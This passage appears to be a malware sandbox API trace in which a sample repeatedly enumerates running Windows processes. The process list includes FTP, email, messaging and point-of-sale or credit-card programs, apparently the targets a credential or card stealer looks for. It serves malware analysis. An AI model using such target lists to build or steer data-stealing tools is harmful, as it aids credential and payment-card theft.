th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0235.411] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0235.412] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0235.414] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0235.415] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0235.417] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0235.418] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0235.420] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0235.421] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0235.422] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0235.424] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0235.425] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0235.427] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0235.429] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0235.430] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0235.432] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0235.434] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0235.436] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0235.438] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0235.439] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0235.441] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0235.443] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0235.444] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0235.446] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0235.448] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0235.486] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0235.488] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0235.490] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0235.491] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0235.493] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0235.494] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0235.497] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0235.498] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0235.500] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0235.501] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0235.503] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0235.505] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0235.506] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0235.508] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0235.509] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0235.511] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0235.513] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0235.514] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0235.516] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0235.517] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0235.519] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0235.520] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0235.522] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0235.523] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0235.525] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0235.526] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0235.575] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0235.577] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0235.578] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0235.580] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0235.581] CloseHandle (hObject=0x17b0) returned 1 [0235.581] Sleep (dwMilliseconds=0x64) [0235.687] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0235.768] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.770] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0235.772] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0235.774] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.776] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0235.779] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.781] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0235.783] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0235.785] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0235.787] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.789] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.791] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0235.793] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.878] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.880] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.881] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.883] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.884] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.886] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.890] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0235.892] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0235.893] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0235.895] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.896] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.898] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0235.899] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0235.901] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0235.902] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.907] Process32Next (in: hSnapshot=0x17b0, 